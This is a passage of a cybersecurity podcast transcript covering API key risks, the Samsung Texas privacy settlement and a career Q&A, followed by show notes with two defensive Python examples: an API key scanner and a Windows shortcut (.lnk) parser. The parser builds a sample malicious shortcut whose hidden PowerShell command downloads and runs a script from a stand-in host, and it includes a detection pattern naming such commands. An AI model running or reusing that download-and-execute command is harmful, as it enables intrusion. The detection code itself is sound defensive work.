stop everything. You can't protect everything. Like, you will have residual risk no matter what.
There's no super silver bullet, bulletproof vest type thing. We will always have risk, period, full stop. So having detections, whether they're immediately detected or they're detected at the end of the billing cycle, is better than nothing. The other thing I want to tell you guys, and this is going to trigger a bunch of people in chat. So if you feel triggered, or hashtag preach, let me know. If you have these API keys, if you change the permissions, you could break production apps. Okay, now here's the reality. You have a choice. If you send out an email to everybody in the company or all the engineers or all the developers and you say, hey guys, hey ladies, who's using Google API keys in their code? Who's using this API key? Right? Maybe you have it redacted some. You are going to get a subset of people who respond. You're never going to, like. Very likely no one's going to respond. So you could say all day, every day, hey, whose keys are these? Whose keys are these? I'm going to shut these keys off, I'm going to change the permissions on these keys. No one will say anything. And then you shut it down or you change the permissions and it breaks something, they are going to scream at you. Okay, so you have a choice. You could either spend a month trying to find these people, or you could just pull the plug on it and see who complains, right? This is a choice that a lot of cyber professionals have had to deal with over the years. A lot of people who, who are more surly and, you know, got scars, gray in the hair, they will pull the plug and see who complains. All right. Maybe you send out one email. Junior people who have all, like, the altruistic ideas of, like, oh, we're gonna do it right? They'll send a bunch of emails out and then get no response. All right? Just FYI. And by the way, if that resonates with you, let me know.
B
Samsung to stop collecting Texans' data. Samsung and the state of Texas have reached a settlement agreement over the alleged unlawful collection of content viewing information through its smart TVs. The company will now have to revise its privacy disclosures to clearly explain its data collection and processing practices to customers. This is all based on a lawsuit filed by Texas Attorney General Ken Paxton last December in which several TV manufacturers were charged with, quote, using automated content recognition technology to collect and process viewing data without first obtaining express informed consent from consumers, end quote. The allegations were that Samsung was using the technology to capture screenshots of consumers' TVs to determine what they were watching in order to deliver targeted advertising. The court found that there was, quote, good cause to believe, end quote, that Samsung automatically enrolled customers in this system using dark patterns that included, quote, over 200 clicks spread across four or more menus for a consumer to read the privacy statements and disclosures, end quote.
A
All right, hey, you know, Texas, shout out to you. Like, you guys might not know it, but Texas is pretty forward on privacy. Like, we usually look at more kind of Democratic, strong states like Maine or. Well, is Maine really Democratic? Like, California for sure, as, like, leading the charge on privacy. But Texas, don't sleep on Texas, man. They are strong with this. So the issue here is that Samsung, as a TV producer, was very nefarious. I've said this a million times, dude. Data is super valuable. Look at the wealthiest people in the world, the wealthiest companies in the world, they broker in data. Either your data for how to market to you, or, like, Google's entire business model is on, you know, scanning the Internet, having all the data to tell you what to do. It's big money. Okay, so Samsung, pretty, pretty serious charges here. They were basically taking screenshots of your TV and then sending it back to analyze what you're watching so they can market to you. Texas, they're going to have to revise their privacy policy. Either one, they're going to change the policy and allow people to continue to click through, and then they'll just have permission to collect your data. I seriously doubt they're going to change it so they're not collecting data in Texas. That would be a pain point, right? Because if I move to Texas, is the TV. No. I don't know. This could be a landmark case, because trust me, LG, Sony, Samsung, I'm sure they're all doing this because it's freaking big money. These dark patterns that they mentioned, by the way, a dark pattern is something that is known in marketing. There are dark arts. There are ways to, like, kind of dupe people into doing things that you want them to do. In this instance, Samsung made the privacy policy, I guess, in order to read it, take 200 clicks. My man, if I'm, if I'm doing something on a TV, like, 200 clicks is breaking my back.
And guys, everybody that has been presented with a size 4 font EULA when installing any software clicks right through it. Right? So a little dubious, Samsung, you know, you've been served. Also really quick, they reached a settlement. I'm sure no citizen, no individual who's running a Samsung TV that was impacted by this is going to see any money. Lawyers made a bunch of money, though.
B
The CISO Series is going bicoastal this month.
A
Nope. All right, hey, let's holler. We had 400 people in chat. Really quickly, if you're here, stay tuned because we're going to be melting your face. What? How do you melt faces? Oh, don't worry. We got you covered for days. I'm Jerry from Simply Cyber. That was your Simply Cyber Daily Cyber Threat Brief podcast. Shout out to all the first-timers, long-timers, shout out to the mods. If you got value from the show, let us know in chat. We'll be back tomorrow at 8:00am Eastern Time to do it again. But know this, we're about to run another show called Jawjacking. You don't have to go anywhere. I take care of all of it. I cannot mentor one on one. People want me to mentor one on one. I do not have time for that. But what I can do is give you half an hour and I will answer all the questions that appear in chat to the best of my ability. If I cannot answer the question, I will get somebody who can answer that question. Let's mentor at scale. I'm Jerry from Simply Cyber. Until next time, stay secure. Ever wonder what it takes to break into cybersecurity? Join us every weekday for Jawjacking, where industry experts answer your burning questions about the cybersecurity field live, unfiltered and totally free. Let's level up together. It's time for some Jawjacking. Yo, what's up, everybody? Welcome to the party. My name is Jerry Guy. I do Jawjacking as the host. Coming hot off the heels from the Daily Cyber Threat Brief, hosted by that nerd, Dr. Gerald Ozier. Hold on, I gotta get. I gotta get more comfortable here. I do declare, there were infographics. You guys can't really tell, but my studio is an absolute hot trash garbage dumpster fire back here with all the gear I'm trying to get prepped for Zero Trust World. Are we doing bingo on Friday? Unlikely. Roswell UK, I'm going to be live from the Zero Trust World conference floor. Already going to be complicated.
I will say Wednesday, Thursday and Friday shows of the Daily Cyber Threat Brief will be special only because, you know, we'll have multiple hosts, because, you know, I'm bringing my big mixing board with four inputs and stuff like that, so. Good question. Thank you very much. All right, if you got questions, put them in chat with a Q really quickly. I do want to point out again that the LinkedIn Claude Code video I released is blowing up. I am so excited because it helps people. It's not just, like, oh, I made a video, go check it out. Like, literally, it can help you. Which is the thing. Roswell UK says, why the pic on the monitor back there? I wish it wasn't there, because I have deleted that graphic file from my computer. And yet somehow it's retained. So I have released. Excuse me, that is a display of a Mac Mini. My Mac Mini has been hardened, wiped and hardened. And I run OpenClaw on it. My AI bot is called Karn. K A R N, Karn. Karn was the servant of a planeswalker in the Magic: The Gathering universe called Urza. This is where Urza lives. So essentially this is, like, where Karn lives. So it was a picture of, like, his house and stuff. I, I would prefer it be the Simply Cyber logo, but I literally cannot change the background. And I've had people tell me how to do it. I've done it. It doesn't work. So that's why this is that. It, it all ties into the identity of the OpenClaw AI bot that I've built. Shall we play a game? Random Skill says, do you use blue light filtering? Either glasses, or set your monitors to filter all blue light? Which is the best, or has worked best for you? So interestingly, these glasses are blue light blocking. I do wear prescription glasses now to read, but these are not prescription. Dude, you know, I don't know what's up with these blue light things. I, I don't wear these except for messing around as Jerry Guy on Jawjacking. I haven't noticed any material improvements of wearing blue light blocking versus not, so to me.
I don't know. Maybe I'm just old and grizzled, and, like. But I don't know. I haven't, I haven't noticed any benefit from blue light blocking. Can you make a GRC Mafia shirt? Soul Shine? Sure. Soul Shine. Here you go. Done. Again, I'm terrible at, like, marketing, so, like, I don't tell people about the merch. I don't tell people about projects I'm working on. I forget to tell people about Simply Cyber Academy. This is my online school with all the courses to help you crush life. Like, I forget to tell people all the stuff all the time. I'm not great at business. I, I, I'm, I'm passionate about helping people and in cybersecurity. All right, here we go. Cyber Shinigami says, ran those prompts from the video in ChatGPT, Notebook, Gemini, Claude, thoughts on Career Span app. It was blowing my mind. Cool, dude. Thank you, Cyber Shinigami. So Cyber Shinigami did my video. Hold on one second. So again, if you haven't seen this yet, I released a video yesterday at 4:00pm that is taking the Internet by storm. Okay. I show you how to use Claude Code and LinkedIn data to absolutely discover unbelievable hidden value in LinkedIn. Okay. So sick. Look at this. Look at this. I have told you guys before, personal branding. Personal branding adds value. You want to guess when I started doing personal branding? This is my LinkedIn profile. You'll notice this ridiculous hockey stick. That's me starting Simply Cyber. All right, come on. Bruising Hacks is excited. Nice. All right, continuing to look. Yes, Bruising Hacks, I have tried turning it off and on again. Oh, Michael Fink with a deep cut. Urza's Glasses. I actually used to run that when I was 14. All right. Real Bilbo is going to be there, I think, at Zero Trust World. Trini Heffy, are we able to receive CPEs for watching on replay? Yeah, I don't see why not. I mean, if you watch. Here's my thing. The Daily Cyber Threat Brief is essentially an instructor-led webinar.
So if you watch it on replay as an instructor led webinar, why wouldn't it be valuable? Yep. Yep. Sean Washington, who's also in my one an upcoming YouTube video, which is pretty cool. Thank you, Jenny. Jawjacking question from Oscar. Is it smart to get into entry level? I t helped us to have a real shot at getting into cyber. Nowadays you can get into cyber without going through help desk. You can get into cyber by going through help desk. Having IT help desk experience certainly can help you. So I. I mean, is it smarter? I mean, that question has a lot of dependencies, right? I mean, what have you done before? Like, I was a software engineer, so I wasn't, you know, I didn't do help desk. I was developing software and then I got into cyber out of pure spite. If you. If you don't know the story, I was very spiteful because my code got audited by security and failed. And I was pissed. So I was going to prove them wrong. In reality, I found my. My passion for cyber. I don't know. I guess for this question, is it smarter to get an entry level IT help desk? I would say this. If you have an IT help desk job opportunity, take it. IT will. And then start migrating towards, like, either going higher up in IT or transitioning over to cyber. Let's see. All right, so Michael Fink has some source material, I mean, some statistical information around using blue light blocking and having benefits from it. So there you go. A lot of talk around the blue light blocking. Sasha M. Is it reasonable to have to pay for an internship or mentoring. No, absolutely not. That's absurd. The. To me, that is predatory. You should be paid for working an internship. That is predatory. All day, every day. That's vile, dude. Now I will say paying for mentoring, okay? If, if it's like a formal coach or you know, work like, like, if it's a formal coaching thing where it's very clear that this is time for money etc, then I can say that paying for that kind of mentoring is fine. 
You can get mentoring for free. You can get mentoring paid. Paying for an internship is absurd. Being able to pay so you can work on for someone, that. That makes me mad, man. So with the AI being so hot, is GRC the new in? I don't understand the question, but we will say GRC is hot. Little doubled shock here. All right, Jerry. Going viral. Thank you legrat. A lot of people commenting on blue lights and help desk stuff. Are many home office GRC work available? Sure, yeah, yeah. Home office or travel. Right? I mean Eduardo, when I was a GRC auditor, I would travel quite a bit to go to remote locations to audit them for, you know, whatever I was auditing them for. So, you know, you didn't have to go to a home office because you were traveling. Hey Jerry, how's that vulnerability management class coming? I talked about this last week. I have all the lectures recorded. I need to record the labs, which is difficult for me to find the time to do so. It's in progress still. Justin says I have four years of help desk and a dozen certs not even getting rejection letters. All right, so Justin, maybe take a look at your resume, see it, maybe get that adjusted a little bit. Maybe spec. Have your resume adjusted for the specific job or. Hey, even. Sorry, one second. Justin, check out this video here. I just. This is the video that I was talking about earlier that I just released. You might be able to use this video to kind of help mine some value out of your LinkedIn connections and network that can help you. Let's see. Continuing to look through chat right now. This is simply Cyber's jawjacking. So if you have a question, just put it in chat with a queue up up front and I will answer it. Looks like we are caught up right now. So any questions that come in the queue, I'm happy to answer. If you did ask a question and I didn't see it, write it again in chat with a queue up front and I will answer it. We're going to go to 9:30, so 15 more minutes with the GRC Master Class. 
Pair with a SEC plus portfolio and a cyber degree. Yeah. Oh, dude. Yeah. I mean that's like a freaking full boat right there. Also want to say really quickly, I got a really nice letter from a woman. Again, listen, really quickly, I cannot promise you a job, okay? Like, that's not how it works. I can't promise you a job. But what I can tell you is my GRC Analyst master class is definitely designed to be practical and get you the skills you need for a job. And several people in simply Cybers community have gotten jobs after taking the Analyst master class. But there's a whole bunch of like prior experience and other things I just want to say quick shout out and I'm going to play a wrecking ball for this one. This woman, Rachel Holmes right here, she emailed me and told me that the GRC Analyst master class was the pivotal thing that changed for her to allow her to get a job as a GRC person. She was in it for 10 years and now she's pivoting. So way to go, Rachel. All right, continuing to look through chat here. Thank you, Jenny. Do you think there's a possibility for the junior and entry level positions in cyber disappear because of AI and MSSP will require less people? No, I don't. So I mean, obviously every industry is going to be disrupted by AI, but one of the cool things about cyber is that your threat actors are typically doing things and using tools in a way that they're not designed, which requires humans to detect that anomalous behavior and be able to kind of identify false positives from true positives. So you're definitely going to need humans in the loop on that one. As far as entry level positions, I'd like to think that instead of being like Soc Analyst Tier 1, it's SOC Analyst Tier 1.5. This is a, this is a perspective from a woman at Cisco named Kirsty Payne, who I'm a big fan of. And essentially it's like AI enabled entry level analysts to be able to move faster, do better. So I think that's what's up. 
Where's the best place to start to crack into auditing? Are there particular industries? Okay, so hey, healthcare for sure, but goats since Yost, go look up cmmc. Charlie, Michael. Michael, Charlie, cmmc. Because a lot of businesses that do business with the US Federal government are going to have to be CMMC compliant. Getting into the CMMC ecosystem as an authorized auditor is total trash. Like it. It is a good old boy pay. You got a pay to play system. But. But you can get work as a readiness assessor. And the big fir, the big firms, Booz Allen, Deloitte, Accenture, Capgemini, even the smaller ones that are more focused on cyber work, like coal fire risk,360, things like that, they are going to be doing CMMC readiness assessments, which is basically audits for businesses before they go pay to get audited for CMMC compliance. This is where I would look. Get familiar with NIST Special Publication 800 171, get familiar with CMMC and what it requires and go find those jobs. I'm telling you, there's going to be a huge cottage industry around cmmc. Audit experience. Mike. Mickey. Mickey says I'm about to finish my bachelor's in cyber. I'm looking at a master's in cyber. Should I wait a few years and get experience? I'm transitioning from the Air Force. Yeah, I mean, honestly, Mickey, if it were me, okay, and this is not for everybody, okay, because your life has to support it. But like, if it were me, I would work full time and get the masters at the same time. Because I mean, think like, listen, again, I am not. Everybody's got their own journey, everybody's got their own thing. I got two masters and a PhD all while working full time. And during my second masters, we had it. We had our first child and during my PhD we had our second child. So I'm telling you right now, it is completely feasible to do these in parallel while working full time. That's what I would recommend. I. 
You know, honestly, Mickey, professional experience, or not honestly, but, like, in being fully transparent, professional experience, practical, hands-on experience, weighs very heavily. If you have a bachelor's and a master's in cyber and no experience, when you go to apply for a job, it's like, that's great, but. Right. So I'm thinking if I look at someone who's got no experience but they got a bachelor's and a master's, and someone who's got a bachelor's and then two years of professional experience, I might lean on that bachelor's-plus-two-years-of-experience candidate if the experience is directly related to the work that I need hired for. So there you go. All right. Continuing to look through chat. Thank you for dropping these in mod chat. It's easier for me to find. Any new hype for SC Con in November? Alternately, since it's the con of the week, anything you're excited for at Zero Trust World 26? So Justin Gold is helping with Simply Cyber Con, getting it stood up, the CFPs, the registration. Kimberly's on the website. So the big update is there's going to be a big amount of information coming out in the next couple weeks, Ryan. Secondly, Zero Trust World. I'm hyped, honestly, to see all the folks, and I'm trying to put together. I'm having dinner with James McQuiggin tomorrow night, which I'm super excited about, and honestly, I'm looking forward to a little bit of a potentially informal Simply Cyber community meetup Thursday night. So stay tuned for that. That's what I'm excited about. Obviously, you know, the conference is fun and learning a bunch of new stuff is fun, but hanging out with the community is always, you know, the best part. Real Billow says please post behind the scenes of AV setup at the con. Love seeing those. Yep, yeah, I will.
I mean, honestly, guys, yesterday I spent a bulk of my time just getting the audio pieces right, because I need four microphones, four mic flags, four XLR cables, four headphones, one mixing board, all the, you know, all the wiring, the power supplies, all that stuff. And that was just the audio. I haven't even done. I'm doing video today and software today, which is like. Do you think cover letters actually make a difference? No. Can you paste the URL for the SCCON 2025 merch? Yeah. Is Kimberly in chat? I don't see Kimberly in chat. Mods, can you help me? The merch for SC 2025 was on Cyber Security Central. Kimberly did it through her site there. So if you can pull that up, please, Mods, we'll get it for you. All right, continuing to look really quickly. Did you forget to turn on the stream to LinkedIn today? No, I don't know. Did I? Says I'm streaming to LinkedIn right now. Oh, I don't know. Come on. It's weird. I'm looking right now. Roswell UK: Unfortunately, Restream failed. I guess that's wild. If I'm on LinkedIn right now and it's not live. Yeah, I guess it didn't. I don't know what to tell you. I mean, it says that it's enabled and everything, so I don't know what's up. Let's see. Continue to look through chat. I see Kyle has a question. I'm just looking for it so I can bring it up on stream. Wearing two hats, since we lost our physical security and access control person, any advice on dual-wielding cyber and physical security? Not really. I mean, physical does fall under the purview of cyber when you're doing audits and stuff like that. I mean, I guess you could. It's possible, since you have the physical security realm now, you could feed swipe access logs into your SIEM, be able to look for weird stuff. Okay, no problem. All right, one second. Yeah, I mean, that's it. Obviously, you know, get to be friends with your data center people. Right? If you have a data center.
Kyle, be friends with them, because, you know, who's accessing the data center is super important. How often do they have physical security controls in place? Like, just go look at the PE control family in NIST 800-53 and that'll give you a pretty solid starting point. Cyber Security Central. Kimberly Can Fix It. Nonprofit. Hold on, I'm trying to find. All right, hold on. Where's the merch? Oh my God. All right, hold on. Cyber Security Central merch store. I mean, it shouldn't be this hard to find these things. Yeah, there is a way to get it, but Kimberly has it. I can't find it right now. See, it's 9:26. Continuing to look through chat. Was there an attendance certificate for SCCON last year? Yes, Michael. Kimberly sent an email out to everybody with a link. You would go in and download it. So connect with @ Kimberly Can Fix It on the Discord server. She should have a link for you. Actually, that's a good point. Spam Musubi, go on the Discord server. If you go to the simplycyber.io Discord and then ping @ Kimberly Can Fix It, she's got the link for the merch. Yeah, I don't know why it's not on LinkedIn today, which is wild, because we had 400 people, which we haven't had in a minute. Yeah, I mean, Roswell UK, the thing is, once I go live, I can't, like, go live on LinkedIn. Like, it's supposed to be, like, literally, if you look at. I mean, check this out. I know it's going to do, like, an infinity thing. But look at LinkedIn right now. Do you see up here on the top? You see on the top right here where it says LinkedIn and YouTube? This is telling me that we are live on YouTube and LinkedIn right now. But when you do this, you see how it says streaming on YouTube but not on LinkedIn. However, it is enabled. You see this toggle on, so it's a Restream issue. I don't know what it is, but I can't fix it, so. Sorry. All right, continuing to look at chat here. How's the thumb?
Oh, yeah, thumb's pretty good. I can actually show it on stream now because it's not disgusting. So it's almost back to normal. The nail still looks all janky. So thank you, Space Tacos, for following that. Took about a month to heal. Let's see, 9:28. Any questions, I'm here for you. Roswell: I remember when the CC used to call her department Two Hats, which I thought was a reference to our ability to do multiple roles. Turned out they just didn't like us. All right. Oh, there you go, Kyle. Kyle found the 20 controls in the PE family. Yeah, don't sleep on this documentation. It is some good stuff, man. All right. So the question is, where is it? I don't see where that question is in chat, but, like, basically, did I watch a YouTube video about how Israel became a cyber power and how the USA pays for their learning? I don't know what YouTube video you're referring to, but Israel is a super cyber power. You know, here's the thing. A lot of cybersecurity product comes out of Israel. It's just they don't come out and be like, oh, it's Israel. Like, Palo Alto is Israeli-based, right? I mean, XM Cyber, like, there's a ton. Israel's got, like, dude, here's the crazy. Not crazy, but here's an interesting thing. Like, when a security product comes out, if it's Israeli-based, it automatically gets treated like, okay, like, this is super legit, because they have a track record of making incredible software. Like, you know, say what you want. I don't like that it's been weaponized. But Pegasus spyware is Israeli-based technology. For the new video: aren't you concerned about uploading your entire data archive to Claude? No, I'm not. I mean, first of all, it's, like, locally on my system, so it is taking some information and pushing it up to Claude. But it's my LinkedIn data. I don't care. LinkedIn already has my data. Microsoft owns LinkedIn. I'm sure Microsoft took all that data and shoved it into Copilot.
So, like, no, I'm not super concerned about it. Good question, though. Kathy Chambers is in the house. Okay. Soul Shine, I don't think you can drop links in YouTube chat, because it's a control we have in place to prevent people from putting malicious links in the chat. All right, guys, it is time. It's 9:30. Thus completes jawjacking, your Simply Cyber bonus content. We'll be back tomorrow at 8:00 a.m. Eastern Time to do it all again live from Simply Cyber, Buffer Osier Flow Studios. But for now, we're gonna put a pin in it. Go check out that YouTube video. I'm super proud of it. I think it's very helpful. If you think it's helpful, share it with your network. Share it with your friends. I'm telling you, there's mad value in this video, 100%. And I actually show you step by step how to walk through and run it. Like, how to build it, how to run it, all those things. Okay. It does take 24 hours to get the LinkedIn data archive. So go request it today. All right, I'm Jerry from Simply Cyber. Peace out, Boy Scout. Until next time, stay secure.
Main Theme:
Dr. Gerald Auger delivers the top eight cybersecurity news stories for March 2, 2026, providing practical insights for cybersecurity professionals, GRC experts, and business leaders. The discussion is wide-ranging, covering government leadership shakeups, new AI-assisted attack methods, malware-as-a-service trends, a cloud API key exposure, and privacy litigation. Each story is broken down with clear, real-world implications, blending expert opinion, humor, and career tips.
On CISA leadership drama:
"This is like a nothing burger story... the only thing I could think of is CISA's involvement in election security." (15:24)
On AI-human collaboration in attacks:
"AI as a tool to move faster. Of course, this is terrible for juniors—the AI is doing the grunt work." (22:45)
On practical GRC advice:
"Identity is the new perimeter... you must have foundational security in place, or you're going to have AI rip your face off." (28:32)
On the reality of IT operations:
"You could either spend a month trying to find these people, or you could just pull the plug on it and see who complains." (53:07)
Topics covered include:
For Cloud Security:
Audit your API keys for scope/restrictions: if you use Google Cloud, hunt for keys beginning with "AIza" (the Google API key prefix) in code, configs and logs, and confirm each one carries both an API restriction and an application restriction (referrer, IP or app). Collaborate with finance to spot billing anomalies as compromise indicators (52:30–59:29).
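One way to do the first half of that audit, as an added example that is not code from the episode or from Google: scan text for credential-shaped strings, rate each hit by Shannon entropy so obvious placeholders are separated from real-looking keys, and report only a redacted form so the scanner's own output does not become a second leak. The Google pattern (the "AIza" prefix plus 35 URL-safe characters) is the one the episode points at; the AWS and GitHub patterns generalise the same idea. The sample files are constructed here and contain no real credentials.

```python
"""Find hard-coded cloud API keys in source/config text and rate whether they look real.

Added example for the "audit your API keys" advice; not code from the episode or from
Google. Google API keys start with "AIza" and are 39 characters long; the AWS and GitHub
patterns are a generalisation. SAMPLE_FILES below are constructed and hold no real keys.
"""
import math
import re
from collections import Counter

# Lookarounds instead of \b: keys may end in '-' or '_', where \b would fail.
KEY_PATTERNS = {
    "google_api_key": re.compile(r"(?<![0-9A-Za-z_-])AIza[0-9A-Za-z_-]{35}(?![0-9A-Za-z_-])"),
    "aws_access_key_id": re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])"),
    "github_token": re.compile(r"(?<![A-Za-z0-9_])gh[pousr]_[A-Za-z0-9]{36}(?![A-Za-z0-9_])"),
}


def shannon_entropy(s: str) -> float:
    """Bits per character; 'AIzaXXXX...' style placeholders score far below real keys."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def redact(key: str) -> str:
    """Keep just enough to locate the key in the file without reproducing it."""
    return key[:6] + "..." + key[-2:]


def find_keys(text: str, source: str = "<text>", min_entropy: float = 3.0) -> list:
    """Return one finding per credential-shaped match, never the key itself."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, pattern in KEY_PATTERNS.items():
            for match in pattern.finditer(line):
                key = match.group(0)
                entropy = shannon_entropy(key)
                findings.append({
                    "source": source,
                    "line": lineno,
                    "kind": kind,
                    "redacted": redact(key),
                    "entropy": round(entropy, 2),
                    # Low entropy = repeated characters = almost certainly a placeholder.
                    "placeholder": entropy < min_entropy,
                })
    return findings


def scan_files(files: dict) -> list:
    """files maps a display name to its text content; returns all findings in order."""
    findings = []
    for name, content in files.items():
        findings.extend(find_keys(content, name))
    return findings


# Constructed sample corpus (not real credentials): one realistic-looking Google key,
# one documentation placeholder, and the well-known AWS documentation example key.
SAMPLE_FILES = {
    "app/config.js": (
        "// constructed sample, not a real key\n"
        "const MAPS_KEY = 'AIzaSyD-k3FqWmVbN8pZx2yTc1QeRuH5jL7oAa0';\n"
    ),
    "README.md": "Set GOOGLE_API_KEY=" + "AIza" + "X" * 35 + " before running.\n",
    "deploy/.env": "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nDB_PASSWORD=not-a-key\n",
}


if __name__ == "__main__":
    import pathlib
    import sys

    if len(sys.argv) > 1:  # scan a real directory tree instead of the samples
        root = pathlib.Path(sys.argv[1])
        files = {str(p): p.read_text(errors="replace") for p in root.rglob("*") if p.is_file()}
    else:
        files = SAMPLE_FILES
    for finding in scan_files(files):
        status = "placeholder" if finding["placeholder"] else "LIKELY REAL"
        print(f"{finding['source']}:{finding['line']} {finding['kind']} "
              f"{finding['redacted']} entropy={finding['entropy']} {status}")
```

Run it against a checkout with `python scan_keys.py path/to/repo`. Every "LIKELY REAL" Google hit is then a two-step job: look the key up in the Cloud Console (or `gcloud services api-keys list`) and check that it has both an API restriction and an application restriction, because an unrestricted key can be used against any enabled billable API, which is exactly how a leaked key turns into the billing anomaly the episode tells you to watch for; then rotate it regardless, since a key that has been in a repo is burned.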
For Air-Gapped Network Defenses:
Implement strict USB policies, block/monitor PowerShell & LNK execution, and reinforce user education.
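The "monitor LNK execution" advice is easier to act on if you can see what a shortcut will actually launch before anyone double-clicks it. The following is an added example, not code from the episode or from any vendor: a minimal parser for the Windows Shell Link (MS-SHLLINK) header and StringData sections, followed by a heuristic check for the tells of a weaponised shortcut (a PowerShell target, encoded or hidden-window switches, and the long run of leading spaces that pushes the real command out of the Properties dialog). The two sample .lnk files are built in code rather than taken from any real campaign; the malicious one uses a non-routable example.invalid URL.

```python
"""Parse a Windows .lnk (MS-SHLLINK) file and flag PowerShell-style launch arguments.

Added example for the "block/monitor PowerShell & LNK execution" advice; not code from
the episode or from any vendor. BENIGN_LNK and MALICIOUS_LNK are constructed below.
"""
import pathlib
import re
import struct

# ShellLinkHeader layout (MS-SHLLINK 2.1): size, CLSID, then LinkFlags at offset 0x14.
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))

# Switches and cmdlets that rarely appear in a legitimate desktop shortcut.
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}|-w(indowstyle)?\s+hidden|"
    r"-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass|\biex\b|"
    r"invoke-expression|downloadstring|frombase64string|\bmshta\b|\brundll32\b)"
)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, relative_path, working_dir, arguments, icon)."""
    try:
        if struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LNK_CLSID:
            raise ValueError("not a Shell Link file")
        flags = struct.unpack_from("<I", data, 0x14)[0]
        pos = HEADER_SIZE
        if flags & HAS_ID_LIST:           # LinkTargetIDList: u16 size, then the IDList
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & HAS_LINK_INFO:         # LinkInfo: u32 total size including itself
            pos += struct.unpack_from("<I", data, pos)[0]
        unicode = bool(flags & IS_UNICODE)
        fields = {"flags": flags}
        for flag, name in STRING_FIELDS:  # each: u16 char count, then the chars, no NUL
            if not flags & flag:
                continue
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * 2 if unicode else count
            raw = data[pos:pos + nbytes]
            if len(raw) != nbytes:
                raise ValueError("truncated StringData")
            pos += nbytes
            fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
        return fields
    except struct.error as exc:
        raise ValueError(f"truncated header: {exc}") from None


def assess_lnk(data: bytes) -> dict:
    """Parse and apply the weaponised-shortcut heuristics; returns reasons for the verdict."""
    info = parse_lnk(data)
    args = info.get("arguments", "")
    target = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "icon_location")).lower()
    reasons = []
    if "powershell" in target or "pwsh" in target or re.search(r"(?i)powershell|\bpwsh\b", args):
        reasons.append("launches PowerShell")
    match = SUSPICIOUS_ARGS.search(args)
    if match:
        reasons.append(f"suspicious argument: {match.group(0)!r}")
    leading = len(args) - len(args.lstrip())
    if leading >= 32:  # padding hides the payload beyond the Target box in Properties
        reasons.append(f"{leading} leading spaces hide the command in the Properties dialog")
    if len(args) > 260:
        reasons.append("argument string far longer than a normal shortcut")
    return {"suspicious": bool(reasons), "reasons": reasons, "fields": info}


def scan_directory(root: str) -> list:
    """Walk a mounted volume (e.g. a USB stick) and report suspicious or unparseable .lnk files."""
    hits = []
    for path in pathlib.Path(root).rglob("*.lnk"):
        try:
            result = assess_lnk(path.read_bytes())
        except ValueError as exc:
            hits.append((str(path), [f"unparseable: {exc}"]))
            continue
        if result["suspicious"]:
            hits.append((str(path), result["reasons"]))
    return hits


def build_lnk(relative_path: str, arguments: str = "") -> bytes:
    """Build a minimal Unicode .lnk with only StringData (no IDList/LinkInfo), for the samples."""
    flags = HAS_REL_PATH | IS_UNICODE | (HAS_ARGS if arguments else 0)
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(HEADER_SIZE - len(header))  # attributes, timestamps, ShowCommand left zero

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + s(relative_path) + (s(arguments) if arguments else b"")


# Constructed samples: a plain Notepad shortcut and a padded PowerShell downloader.
BENIGN_LNK = build_lnk(r"..\..\Windows\System32\notepad.exe")
MALICIOUS_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    " " * 120 + "-nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage.ps1')\"",
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("malicious", MALICIOUS_LNK)):
        verdict = assess_lnk(blob)
        print(label, "suspicious" if verdict["suspicious"] else "clean", verdict["reasons"])
```

`scan_directory("E:\\")` is the practical entry point when a removable drive shows up: anything flagged is worth pulling before a user opens it. The parser deliberately stops after StringData; the ExtraData blocks that follow (environment variables, known folders, tracker data) carry attribution value for forensics but are not needed to answer "what does this run".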
For Privacy/Consumer Protection:
Read EULAs and beware of "dark patterns" designed to discourage informed consent. For practitioners: Monitor impending regulatory changes—what happens in Texas may happen in other states soon.
| MM:SS | Segment |
|-------|---------|
| 11:19 | CISA director ousted |
| 16:02 | NSA/Cyber Command confirmation controversy |
| 21:38 | Mexican government hacked by AI-powered attack |
| 28:51 | North Korean APT: Air-gapped malware campaign |
| 39:22 | Community Member of the Week |
| 44:03 | Steelite RAT: malware-as-a-service for double extortion |
| 51:40 | Google Cloud API key exposure with Gemini access |
| 59:29 | Samsung sued in Texas over TV viewing data collection |
| 63:03 | Transition to Q&A, practical career and technical advice |
This episode captures the rapidly evolving intersection of advanced threats (AI in cybercrime), vulnerabilities in modern cloud environments, and continued fallout from insufficient privacy practices. Dr. Auger’s analysis weaves direct industry takeaways with relatable stories for practitioners at every level. The community Q&A at the end offers concrete advice for career development in a shifting IT landscape.
For more or to participate live, join the #TeamSC community on Simply Cyber (simplycyber.io).